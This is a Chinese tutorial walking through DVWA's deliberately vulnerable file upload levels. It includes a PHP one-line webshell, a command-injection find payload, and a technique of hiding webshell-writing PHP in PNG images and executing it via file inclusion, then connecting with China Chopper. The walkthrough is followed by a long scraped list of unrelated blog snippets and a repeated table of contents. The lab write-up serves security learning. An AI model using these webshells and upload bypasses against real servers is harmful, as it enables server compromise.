DVWA靶机-文件上传漏洞(File Upload)

文件上传漏洞的四个等级，low，medium，high，impossible，今天我们针对于不同的等级进行基于文件上传漏洞的攻击

DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级

DVWA靶机-命令注入漏洞(Command Injection)

DVWA靶机-文件包含漏洞(File Inclusion)

文件上传漏洞

文件上传漏洞通常是由于对用户上传的文件的类型、内容没有进行严格的过滤、检查，使攻击者可以通过上传木马、病毒、恶意脚本等来获取服务器的webshell权限，从而攻击服务器，在DVWA靶机中，为PHP环境，我们可以上传PHP一句话木马，用中国菜刀连接获取webshell权限，从而攻击服务器。

1.DVWA-LOW等级下的文件上传漏洞

WEB页面回显有两个选项，浏览、上传，我们可以通过浏览文件来选取windows中想上传的文件

我们在之前的漏洞中我们发现，在LOW等级下无任何的安全策略，我们可直接创建一个PHP文件，写入一句话木马，上传

创建muma.php文件，写入一句话木马：

PHP一句话木马：

 @eval($_POST[123]);?>

上传成功后我们需找到该文件所在的路径，才能用中国菜刀工具来连接，我们发现web页面回显中有部分路径，../../hackable/uploads/muma.php ，此时我们可以借助 命令注入漏洞(Command Injection) 来查找刚上传的一句话木马文件。

切换到Command Injection

查找上传的木马文件路径：

|| find / -name muma.php --在/目录下面查找muma.php文件所在位置

中国菜刀软件连接，测试该PHP一句话木马是否生效

LOW等级下的文件上传源码

File Upload Source：
在low等级下没有定义任何安全策略



if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo 'Your image was not uploaded.
';
    }
    else {
        // Yes!
        echo "{$target_path} succesfully uploaded!
";
    }
}

?>

2.DVWA-Medium等级下的文件上传漏洞

在之前的漏洞攻击中，我们发现Medium等级下必定定义了安全策略，我们此时先按照low等级下的步骤上传php文件

创建muma1.php文件，写入一句话木马：

 @eval($_POST[456]);?>

在上传过程中，我们发现此时无法上传muma1.php文件，web页面回显，Your image was not uploaded.We can only accept JPEG or PNG images，也就是说我们此时无法上传php格式的文件，只能上传JPEG或者PNG格式文件

Medium等级下的文件上传源码：
File Upload Source：

限制了文件的格式，大小



if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo 'Your image was not uploaded.
';
        }
        else {
            // Yes!
            echo "{$target_path} succesfully uploaded!
";
        }
    }
    else {
        // Invalid file
        echo 'Your image was not uploaded. We can only accept JPEG or PNG images.
';
    }
}

?>

解决问题： 此时我们无法通过上传文件的形式来注入PHP一句话木马，我们可以通过上传JPEG或者PNG的图片，在图片ASCII编码中加入一句话木马，通过文件包含漏洞来解析该图片，从而执行木马。

注：由于文件包含在解析PNG图片时，不能直接解析一句话木马，也就是说只有php格式的木马文件，我们才能用中国菜刀来连接，所以此时必须在PNG图片中进行PHP文件的创建写入文件操作

 fputs(fopen("muma1.php","w"),'')?>

(1).我们随便在电脑屏幕中截一张图，用HxD Hex Editor编辑器打开图片，在ASCII编码末尾，加入木马

muma1.PNG

(2).上传muma1.PNG文件

上传成功

(3).通过文件注入漏洞查找上传路径

(4).通过文件包含漏洞解析该PNG文件

该PNG文件通过WEB页面打开，会出现如下图的乱码，此时应该已经解析该PNG图片，同时也应该已经执行了PHP一句话木马。

(5).此时在文件包含目录下解析，如果执行了木马，应该在`/var/www/DVWA-1.9/vulnerabilities/fi/`目录下出现muma1.php文件

我们通过命令注入漏洞查看是否已经创建了muma1.php文件

(6).中国菜刀连接测试，该一句话木马是否执行

3.DVWA-High等级下的文件上传漏洞

既然在medium等级下无法直接上传PHP格式的木马文件，那必然在High等级下也无法上传，也必然有更强的安全策略与过滤。

High等级下的文件上传源码：

File Uploads Source：
strrpos()函数： 在此处，查找’.'在文件名中的位置
substr()函数： 在此处，针对于strrpos()函数得出的结果+1，在文件名截取相应的字符串。
strtolower()函数 将所有的字符转换为小写



if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo 'Your image was not uploaded.
';
        }
        else {
            // Yes!
            echo "{$target_path} succesfully uploaded!
";
        }
    }
    else {
        // Invalid file
        echo 'Your image was not uploaded. We can only accept JPEG or PNG images.
';
    }
}

?>

(1).同medium等级一样我们随便在电脑屏幕中截一张图，用HxD Hex Editor编辑器打开图片，在ASCII编码末尾，加入木马

muma2.PNG

 fputs(fopen("muma1.php","w+"),'')?>

(2).上传muma2.PNG文件

(3).通过文件包含解析该PNG文件

由于我们在Medium等级已经知道该文件上传后的路径在/var/www/DVWA-1.9/hackable/uploads/目录下，我们再此处直接用文件包含漏洞打开该PNG文件，让其解析执行木马

注：在High等级下文件包含漏洞指定了特定的格式，需要File:///来访问文件，具体请看文件包含漏洞

(4).此时在文件包含目录下解析，如果执行了木马，应该在`/var/www/DVWA-1.9/vulnerabilities/fi/`目录下出现muma2.php文件

在high等级下的命令注入漏洞过滤了许多字符，此时无法用命令注入漏洞来查看muma2.php文件是否创建完成，我们可以直接用中国菜刀连接，在测试木马是否执行的同时测试muma2.php木马文件是否创建

(5).用中国菜刀连接muma2.php，测试一句话木马文件是否创建与执行

DVWA-impossible等级

impossible等级的安全策略以及过滤：
token机制： 基于token的验证，随机数
MD5： 针对于文件名做MD5加密
int_get()函数： 获取一个配置选项的值
sys_get_temp_dir()： 返回用于临时文件的目录
uniqid() 函数： 基于以微秒计的当前时间，生成一个唯一的 ID，同时使用MD5()函数加密
imagecreatefromjpeg() 函数： 用于从文件或 URL 载入一幅图像
imagedestroy() 函数： 释放与 image 关联的内存
imagejpeg()函数： 以 JPEG 格式将图像输出到浏览器或文件

File uploads Source：



if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "${target_file} succesfully uploaded!
";
        }
        else {
            // No
            echo 'Your image was not uploaded.
';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo 'Your image was not uploaded. We can only accept JPEG or PNG images.
';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

调研App里的WebDAV功能@FE File Explorer 文件管理器（二） jaminezhong
今天我又淘到一款特容易链接WebDAV的软件：FEFileExplorer我觉得它最大好处是在Mac版电脑、Android、iOS上，一个全功能的文件上管理app。而且还可以在您的iOS、安卓和Mac电脑上使用流媒体方式播放网络共享、NAS里面的视频和音乐。FEFileExplorerPro+穿越派=个人私有云需要穿越派的，在这里下：https://www.huluer.com/usercente
Css-loader安装失败,webpack打包css文件时，确认css-loader和style-loader安装正确，import路径都正确，打包反复报错... Malong Wu Css-loader安装失败
webpack打包css文件时，确认css-loader和style-loader都安装正确，且import路径都正确，打包反复报错：ERRORin./src/assets/styles/test.css1:0Moduleparsefailed:Unexpectedtoken(1:0)Youmayneedanappropriateloadertohandlethisfiletype,current
解决： ImportError: Missing optional dependency ‘openpyxl’. Use pip or conda to install openpyxl. 白舟的博客抠脑问题 pip conda
问题：使用代码时：importpandasaspd#替换为你的Excel文件路径excel_path='path_to_your_excel_file.xlsx'#使用pandas的read_excel函数读取Excel文件df=pd.read_excel(excel_path)#将DataFrame转换为数组data_array=df.values#打印数组print(data_array)然后
mac上安装和卸载java的jdk 默然相爱鱼鱼鱼 jdk
mac上安装和卸载java的jdkbrew安装brewcaskinstalljava8#安装java81配置Java环境变量1、定位JAVA_HOME位置/usr/libexec/java_home12、编辑profile文件vim~/.bash_profile1格式参考JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_152.jdk/Con
Redis中的AOF重写过程及其实际应用 CopyLower Java 学习 Redis redis java 数据库
引言在Redis中，持久化是确保数据安全和稳定运行的关键部分。Redis提供了两种持久化方式：RDB快照和AOF（AppendOnlyFile）日志。相比RDB快照，AOF能够更频繁地保存数据变更，并且在服务器崩溃后能够更快地恢复数据。然而，随着时间的推移，AOF文件可能会变得越来越大，从而影响Redis的性能。为了应对这一问题，Redis引入了AOF重写机制，通过优化和压缩AOF文件的大小，确保
mysql 把多条符合条件的数组 json 合并成一条 KingFu28 mysql json
selectc.PROC_INST_ID_,sfj.file_jsonfrombpm_check_opinioncleftjoinsys_file_jsonsfjontimestampdiff(minute,sfj.create_time,c.CREATE_TIME_)between0and3--三分钟内wherec.PROC_INST_ID_='10000005440002';查询结果：1000
pyinstaller｜打包生成的EXE报错No module named ‘openpyxl.cell._writer‘ 孤独的追光者 Python python
一、问题描述#-*-coding:utf-8-*-#@CreateTime:2024/4/2213:38#@EditTime:2024/4/2310:59#@Author:Tim#@File:UI.py#@Software:PyCharmimportreimporttkinterastkfromtkinterimportttkfromtkinterimportmessageboximportpan
Autosar MCAL从入门到精通系列讲解--总目录常学常思 Autosar --MCAL从入门到精通嵌入式硬件 mcu 单片机 Autosar
前言欢迎大家一起来学习Autosar，作为一个小白，在最开始的时候也是一脸茫然，不知道如何去学习，如何下手。在这里，我将记录我所有Autosar学习的过程，问题点，以及分享我的代码供大家参考。最终能让大家快速上手。Mcal：可以去官网下载一、EB1.EBtresos创建工程2.EB生成代码编译---makefile二、TricoreMcal实战系列(EB)这里的博客之前都是用S32DS来配置的，在
docker打印容器启动命令和输出dockerfile liujiangxu docker docker 容器运维
runlike：通过容器打印启动命令通过pip方式安装pipinstallrunlike通过容器方式安装（永久别名：配置在~/.bashrc中）aliasrunlike="dockerrun--rm-v/var/run/docker.sock:/var/run/docker.sockassaflavie/runlike"用法：runlike容器名/容器idrunlike-p容器名/容器id示例：r
SeaweedFS接口-Filer Server API 九品神元师 SeaweedFS
YoucanappendtoanyHTTPAPIwith&pretty=ytoseeaformattedjsonoutput.FilerserverPOST/PUT/Getfiles#BasicUsage://createoroverwritethefile,thedirectories/path/towillbeautomaticallycreatedPOST/path/to/file//get
VS2022 整个解决方案快速查找失效--解决办法 xk_hypothesis vs2022 microsoft
VS2022整个解决方案快速查找失效–解决办法(其它VS版本可能也一样，但未亲测)最近在使用Vs2022的过程中，发现了使用"快速查找(Ctrl+F)"整个解决方案时，内容搜索不出来的问题解决方案见下:删除“C：\ProgramFiles\MicrosoftVisualStudio\2022[Enterprise/Pro/Community]\Common7\IDE\CommonExtension
Ubuntu Docker容器解决中文环境问题 llc的足迹运维 ubuntu docker linux
在Dockerfile中添加一下指令：#解决中文环境问题RUNapt-getupdate&&\apt-getinstall-ylanguage-pack-zh-hans&&\locale-genzh_CN.UTF-8&&update-localeLANG=zh_CN.UTF-8LC_ALL=zh_CN.UTF-8ENVLANG='zh_CN.UTF-8'ENVLANGUAGE='zh_CN:zh:
如何在MyEclipse中更改servlet模板轻口味常见问题 myeclipse servlet templates 2010
刚换上Myeclipse9.0,结果要修改servlet模板的时候不像Myeclpse6.5一样能搜索的到servlet.java了.网上搜了下也没有搜到,还好求助了下老师,方法如下：在x:ProgramFilesMyEclipseCommonplugins下找到com.genuitec.eclipse.wizards_9.0.0.me201012172208.jar,然后用winrar打开,找到
C# GDI+发生一般性错误（A generic error occurred in GDI+)）黄同学real C#c#microsoft 服务器
C#GDI+发生一般性错误（AgenericerroroccurredinGDI+)）C#GDI+发生一般性错误（AgenericerroroccurredinGDI+)）解决思路：因为.netGDI+是对底层的封装。所以可以尝试用Marshal.GetLastWin32Error();函数获得底层错误代码。try{image.Save(filename,System.Drawing.Imagin
ActiveMQ集群、负载均衡、消息回流星星都没我亮 ActiveMQ activemq
文章目录集群配置主备集群SharedFileSystemMasterSlavefailover故障转移协议TransportOptions负载均衡静态网络配置可配置属性URI的几个属性NetworkConnectorProperties动态网络配置消息回流消息副本集群配置官方文档http://activemq.apache.org/clustering主备集群http://activemq.apa
使用DuiLib进行UI开发的虚函数解析及控件绑定、响应与消息处理吃面不喝汤66 Duilib ui c++xml microsoft
DuiLib是一个开源的基于DirectUI思想的Windows界面库，提供了灵活且易用的UI界面开发能力。在使用DuiLib进行开发时，我们常常会遇到一些虚函数，它们在不同的阶段被调用，以完成各种初始化和消息处理工作。本文将详细介绍DuiLib中的一些关键虚函数的作用，并讲解如何通过XML定义控件、进行控件绑定和响应，以及处理消息。一、DuiLib中的关键虚函数GetSkinFile作用：返回应
人生苦短我用Python pandas文件格式转换程序喵D 人生苦短我用Python python pandas
人生苦短我用Pythonpandas文件格式转换前言示例1excel与csv互转常用格式的方法FlatfileExcelJSONXML示例2常用格式转换简要需求依赖export方法main方法附其它格式的方法HTMLPicklingClipboardLatexHDFStore:PyTables(HDF5)FeatherParquetORCSASSPSSSQLGoogleBigQuerySTATA前
消息中间件之ActiveMQ — 07 筑梦之人消息中间件MQ java activemq
集群配置官方文档主备集群官方文档MasterSlaveTypeRequirementsProsConsSharedFileSystemMasterSlave共享文件系统，如SAN需要运行多个slave。当master挂掉之后会自动进行故障恢复需要共享文件系统JDBCMasterSlave共享数据库需要运行多个slave。当master挂掉之后会自动进行故障恢复需要一个共享的数据库。也相对缓慢，因为
Linux shell sed 命令详解 BugBear1989
详细的sed命令详解，请参考https://my.oschina.net/u/3908182/blog/1921761一、sed命令工作机制：每次读取一行文本至“模式空间(patternspace)”中，在模式空间中完成处理；将处理结果输出至标准输出设备；语法：sed[OPTION]...{script}[input-file]...参数说明-r支持扩展正则表达式-n静默模式-escript1-e
出现 xxx missing 1 required positional argument: ‘self‘ 解决方法码农研究僧 BUG python bug
目录1.问题所示2.原理分析3.解决方法1.问题所示编译代码的时候，出现如下问题：E:\software\anaconda3\envs\py3.10\python.exeF:\python_project\test\main.pyTraceback(mostrecentcalllast):File"F:\python_project\test\main.py",line36,
Android性能优化之启动速度优化 Just_Paranoid Android android 性能优化 Profiler Systrace
Android性能优化之启动速度优化1.App启动流程2.测试启动耗时的方法3.测试启动耗时的分析工具3.1AndroidProfiler3.2TraceView3.3Systrace4.如何优化启动时间4.1.减少DEX文件大小4.2优化Application初始化4.3优化Activity加载4.4使用启动引导页4.5使用启动优化库5.代码分析示例启动速度是衡量Android应用性能的重要指标
gdb 调试，如何让一个断点 “平时不触发，在触发 2000 次后，gdb 进入调试模式” ？ shimly123456 chrome 前端
这里需要结合breakpoint和commands两个命令一起使用首先先使用break给某个行号、地址、或者函数打断电，命令如下：breakmy_function随后使用commands命令，给这个断点设置命令（即，断点触发时的命令）(gdb)breakmy_functionBreakpoint1at0x4005d6:filemy_program.cpp,line10.(gdb)commands1
基于geotools,java 存储geojson、shapefile、postgis的导入导出和转换功能 Kevin_wang3 yieryi@github geotools postgis geojson shp java
2021年1月23日自己简单总结了以下，在github上。链接地址：https://github.com/yieryi/gts4vect如果改功能对您有用，欢迎star,代码只写了第一版，有人反馈问题的话我会改进的。该博客为原创，转载请注明链接；https://blog.csdn.net/imlang/article/details/81434652；下面的代码介绍参考性不大，大约是18年写的。没
成功解决 -bash:***: command not found 方永 Linux bash centos linux
1、获取系统环境路径[root@centos~]#echo$PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin2、修改~/.bash_profile，在最后添加环境变量[root@centos~]#cd~[root@centos~]#vim~/.bash_profile###在底部加上上面获取的路径e
Python安装NumPy 0阿齐兹0 阿齐兹的PyCV学习笔记 python numpy
打开cmd通过python和pip安装：C:\"ProgramFiles"\Python36\python.exe-mpipinstall--usernumpyscipymatplotlibipythonjupyterpandassympynose参考资料：https://www.scipy.org/install.html
vscode 使用git bash，路径分隔符缺少问题 huoxingwen vscode vscode
window使用bash--login-i使用bash时候，在系统自带的terminal里面进入，测试conda可以正常输出，但是在vscode里面输入conda发现有问题bash:C:\Users\marswennaconda3\Scripts:Nosuchfileordirectory实际路径应该要为C:\Users\marswen\anaconda3\Scripts少了\a，很明显\a在vs
idea中 google-java-format 插件的使用用户昵称23 java intellij-idea java ide 全文检索运维
google-java-format是一个重新格式化Java源代码以符合GoogleJavaStyle的插件。一个google-java-format可从插件库下载也可以在IDE的File→Settings–>Plugins中下载。单击Marketplace选项卡，搜索google-java-format插件，然后单击Install按钮。默认情况下，该插件将被禁用。要在当前项目中启用它，请转到Fi
Go gin使用命令安装失败原因，及解决方法大龄Python青年 golang gin 开发语言
Gogin使用命令安装失败明明使用的是golang中的web框架gin文档中的命令来安装gin的，而且是直接复制的，可是为什么会安装失败，并且会提示go:go.modfilenotfoundincurrentdirectoryoranyparentdirectory.这是什么意思呢？大概意思是在当前的工作目录或任一上一级的目录中都没有go.mod文件。goget-ugithub.com/gin-g
pytest 常用的辅助函数和工具函数 Lightning-py Python pytest python 开发语言
pytest常用的辅助函数和工具函数示例#@File:my_module.pydeffetch_data():return'processdata'defprocess_data():data=fetch_data()returndata.upper()importloggingimportsysimportpytest#01-------------------------------@pyte
多进程把文件当做锁使用(python) kuaileXG python 开发语言
#test.pyimportfcntlimportosimporttimedefacquire_lock(filename):fd=os.open(filename,os.O_RDWR|os.O_CREAT)try:fcntl.flock(fd,fcntl.LOCK_EX|fcntl.LOCK_NB)exceptBlockingIOError:print("Fileislockedbyanothe
矩阵求逆（JAVA）初等行变换 qiuwanchi 矩阵求逆（JAVA）
package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(初等行变换) * @author 邱万迟 *
JDK timer antlove java jdk schedule code timer
1.java.util.Timer.schedule(TimerTask task, long delay)：多长时间（毫秒）后执行任务 2.java.util.Timer.schedule(TimerTask task, Date time)：设定某个时间执行任务 3.java.util.Timer.schedule(TimerTask task, long delay,longperiod
JVM调优总结 -Xms -Xmx -Xmn -Xss coder_xpf jvm 应用服务器
堆大小设置JVM 中最大堆大小有三方面限制：相关操作系统的数据模型（32-bt还是64-bit）限制；系统的可用虚拟内存限制；系统的可用物理内存限制。32位系统下，一般限制在1.5G~2G；64为操作系统对内存无限制。我在Windows Server 2003 系统，3.5G物理内存，JDK5.0下测试，最大可设置为1478m。典型设置： java -Xmx
JDBC连接数据库 Array_06 jdbc
package Util; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class JDBCUtil { //完
Unsupported major.minor version 51.0（jdk版本错误） oloz java
java.lang.UnsupportedClassVersionError: cn/support/cache/CacheType : Unsupported major.minor version 51.0 (unable to load class cn.support.cache.CacheType) at org.apache.catalina.loader.WebappClassL
用多个线程处理1个List集合 362217990 多线程 thread list 集合
昨天发了一个提问，启动5个线程将一个List中的内容，然后将5个线程的内容拼接起来，由于时间比较急迫，自己就写了一个Demo，希望对菜鸟有参考意义。。 import java.util.ArrayList; import java.util.List; import java.util.concurrent.CountDownLatch; public c
JSP简单访问数据库香水浓 sql mysql jsp
学习使用javaBean，代码很烂，仅为留个脚印 public class DBHelper { private String driverName; private String url; private String user; private String password; private Connection connection; privat
Flex4中使用组件添加柱状图、饼状图等图表 AdyZhang Flex
1.添加一个最简单的柱状图 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?xml version= "1.0"&n
Android 5.0 - ProgressBar 进度条无法展示到按钮的前面 aijuans android
在低于SDK < 21 的版本中，ProgressBar 可以展示到按钮前面，并且为之在按钮的中间，但是切换到android 5.0后进度条ProgressBar 展示顺序变化了，按钮再前面，ProgressBar 在后面了我的xml配置文件如下： [html] view plain copy <RelativeLa
查询汇总的sql baalwolf sql
select list.listname, list.createtime,listcount from dream_list as list , (select listid,count(listid) as listcount from dream_list_user group by listid order by count(
Linux du命令和df命令区别 BigBird2012 linux
1，两者区别 du，disk usage,是通过搜索文件来计算每个文件的大小然后累加，du能看到的文件只是一些当前存在的，没有被删除的。他计算的大小就是当前他认为存在的所有文件大小的累加和。
AngularJS中的$apply，用还是不用？ bijian1013 JavaScript AngularJS $apply
在AngularJS开发中，何时应该调用$scope.$apply()，何时不应该调用。下面我们透彻地解释这个问题。但是首先，让我们把$apply转换成一种简化的形式。 scope.$apply就像一个懒惰的工人。它需要按照命
[Zookeeper学习笔记十]Zookeeper源代码分析之ClientCnxn数据序列化和反序列化 bit1129 zookeeper
ClientCnxn是Zookeeper客户端和Zookeeper服务器端进行通信和事件通知处理的主要类，它内部包含两个类，1. SendThread 2. EventThread， SendThread负责客户端和服务器端的数据通信，也包括事件信息的传输，EventThread主要在客户端回调注册的Watchers进行通知处理 ClientCnxn构造方法 &
【Java命令一】jmap bit1129 Java命令
jmap命令的用法： [hadoop@hadoop sbin]$ jmap Usage: jmap [option] <pid> (to connect to running process) jmap [option] <executable <core> (to connect to a
Apache 服务器安全防护及实战 ronin47
此文转自IBM. Apache 服务简介 Web 服务器也称为 WWW 服务器或 HTTP 服务器 (HTTP Server)，它是 Internet 上最常见也是使用最频繁的服务器之一，Web 服务器能够为用户提供网页浏览、论坛访问等等服务。由于用户在通过 Web 浏览器访问信息资源的过程中，无须再关心一些技术性的细节，而且界面非常友好，因而 Web 在 Internet 上一推出就得到
unity 3d实例化位置出现布置？ brotherlamp unity教程 unity unity资料 unity视频 unity自学
问：unity 3d实例化位置出现布置？答：实例化的同时就可以指定被实例化的物体的位置,即 position Instantiate (original : Object, position : Vector3, rotation : Quaternion) : Object 这样你不需要再用Transform.Position了, 如果你省略了第二个参数(
《重构，改善现有代码的设计》第八章 Duplicate Observed Data bylijinnan java 重构
import java.awt.Color; import java.awt.Container; import java.awt.FlowLayout; import java.awt.Label; import java.awt.TextField; import java.awt.event.FocusAdapter; import java.awt.event.FocusE
struts2更改struts.xml配置目录 chiangfai struts.xml
struts2默认是读取classes目录下的配置文件，要更改配置文件目录，比如放在WEB-INF下，路径应该写成../struts.xml(非/WEB-INF/struts.xml) web.xml文件修改如下： <filter> <filter-name>struts2</filter-name> <filter-class&g
redis做缓存时的一点优化 chenchao051 redis hadoop pipeline
最近集群上有个job，其中需要短时间内频繁访问缓存，大概7亿多次。我这边的缓存是使用redis来做的，问题就来了。首先，redis中存的是普通kv，没有考虑使用hash等解结构，那么以为着这个job需要访问7亿多次redis，导致效率低，且出现很多redi
mysql导出数据不输出标题行 daizj mysql 数据导出去掉第一行去掉标题
当想使用数据库中的某些数据，想将其导入到文件中，而想去掉第一行的标题是可以加上-N参数如通过下面命令导出数据： mysql -uuserName -ppasswd -hhost -Pport -Ddatabase -e " select * from tableName" > exportResult.txt 结果为： studentid
phpexcel导出excel表简单入门示例 dcj3sjt126com PHP Excel phpexcel
先下载PHPEXCEL类文件，放在class目录下面，然后新建一个index.php文件，内容如下 <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE); if (PHP_SAPI == 'cli') die('
爱情格言 dcj3sjt126com 格言
1) I love you not because of who you are, but because of who I am when I am with you. 　　我爱你，不是因为你是一个怎样的人，而是因为我喜欢与你在一起时的感觉。 　　2) No man or woman is worth your tears, and the one who is, won‘t
转 Activity 详解——Activity文档翻译 e200702084 android UI sqlite 配置管理网络应用
activity 展现在用户面前的经常是全屏窗口，你也可以将 activity 作为浮动窗口来使用（使用设置了 windowIsFloating 的主题），或者嵌入到其他的 activity （使用 ActivityGroup ）中。当用户离开 activity 时你可以在 onPause() 进行相应的操作。更重要的是，用户做的任何改变都应该在该点上提交 ( 经常提交到 ContentPro
win7安装MongoDB服务 geeksun mongodb
1. 下载MongoDB的windows版本：mongodb-win32-x86_64-2008plus-ssl-3.0.4.zip，Linux版本也在这里下载，下载地址： http://www.mongodb.org/downloads 2. 解压MongoDB在D:\server\mongodb, 在D:\server\mongodb下创建d
Javascript魔法方法:__defineGetter__,__defineSetter__ hongtoushizi js
转载自： http://www.blackglory.me/javascript-magic-method-definegetter-definesetter/ 在javascript的类中,可以用defineGetter和defineSetter_控制成员变量的Get和Set行为例如,在一个图书类中,我们自动为Book加上书名符号: function Book(name){
错误的日期格式可能导致走nginx proxy cache时不能进行304响应 jinnianshilongnian cache
昨天在整合某些系统的nginx配置时，出现了当使用nginx cache时无法返回304响应的情况，出问题的响应头： Content-Type:text/html; charset=gb2312 Date:Mon, 05 Jan 2015 01:58:05 GMT Expires:Mon , 05 Jan 15 02:03:00 GMT Last-Modified:Mon, 05
数据源架构模式之行数据入口 home198979 PHP 架构行数据入口
注：看不懂的请勿踩，此文章非针对java，java爱好者可直接略过。一、概念行数据入口（Row Data Gateway）：充当数据源中单条记录入口的对象，每行一个实例。二、简单实现行数据入口为了方便理解，还是先简单实现： <?php /** * 行数据入口类 */ class OrderGateway { /*定义元数
Linux各个目录的作用及内容 pda158 linux 脚本
1）根目录“/” 　　根目录位于目录结构的最顶层，用斜线（/）表示，类似于 Windows 操作系统的“C:\“，包含Fedora操作系统中所有的目录和文件。　　2）/bin 　　/bin 　　目录又称为二进制目录，包含了那些供系统管理员和普通用户使用的重要 linux命令的二进制映像。该目录存放的内容包括各种可执行文件，还有某些可执行文件的符号连接。常用的命令有：cp、d
ubuntu12.04上编译openjdk7 ol_beta HotSpot jvm jdk OpenJDK
获取源码从openjdk代码仓库获取(比较慢) 安装mercurial Mercurial是一个版本管理工具。 sudo apt-get install mercurial 将以下内容添加到$HOME/.hgrc文件中，如果没有则自己创建一个： [extensions] forest=/home/lichengwu/hgforest-crew/forest.py fe
将数据库字段转换成设计文档所需的字段 vipbooks 设计模式工作正则表达式
哈哈，出差这么久终于回来了，回家的感觉真好！ PowerDesigner的物理数据库一出来，设计文档中要改的字段就多得不计其数，如果要把PowerDesigner中的字段一个个Copy到设计文档中，那将会是一件非常痛苦的事情。

DVWA靶机-文件上传漏洞(File Upload)

DVWA靶机-文件上传漏洞(File Upload)

DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级

DVWA靶机-命令注入漏洞(Command Injection)

DVWA靶机-文件包含漏洞(File Inclusion)

文件上传漏洞

1.DVWA-LOW等级下的文件上传漏洞

LOW等级下的文件上传源码

2.DVWA-Medium等级下的文件上传漏洞

(1).我们随便在电脑屏幕中截一张图，用HxD Hex Editor编辑器打开图片，在ASCII编码末尾，加入木马

(2).上传muma1.PNG文件

(3).通过文件注入漏洞查找上传路径

(4).通过文件包含漏洞解析该PNG文件

(5).此时在文件包含目录下解析，如果执行了木马，应该在/var/www/DVWA-1.9/vulnerabilities/fi/目录下出现muma1.php文件

(6).中国菜刀连接测试，该一句话木马是否执行

3.DVWA-High等级下的文件上传漏洞

(1).同medium等级一样我们随便在电脑屏幕中截一张图，用HxD Hex Editor编辑器打开图片，在ASCII编码末尾，加入木马

(2).上传muma2.PNG文件

(3).通过文件包含解析该PNG文件

